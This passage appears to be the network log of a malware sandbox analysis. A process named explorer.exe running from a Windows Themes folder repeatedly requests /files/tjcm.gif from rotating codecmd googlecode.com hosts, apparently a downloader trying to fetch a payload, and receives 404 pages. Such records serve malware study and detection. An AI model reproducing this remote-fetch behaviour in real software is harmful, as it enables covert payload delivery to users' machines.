                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:10.990714073 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      65192.168.2.549779108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:11.427097082 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:12.115190983 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:12 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:12.115674019 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      66192.168.2.54978074.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:13.508924007 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:14.194288969 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:14 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:14.194312096 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      67192.168.2.549781108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:14.701021910 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:15.352032900 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:15 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:15.352061987 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      68192.168.2.549782108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:15.813838959 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:16.504347086 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:16 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:16.504374981 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      69192.168.2.54978374.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:16.851593018 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:17.543776035 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:17 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:17.543796062 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      70192.168.2.549784108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:17.931408882 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:18.708412886 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:18 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:18.708436012 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      71192.168.2.549785108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:19.279026985 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:19.913357019 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:19 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
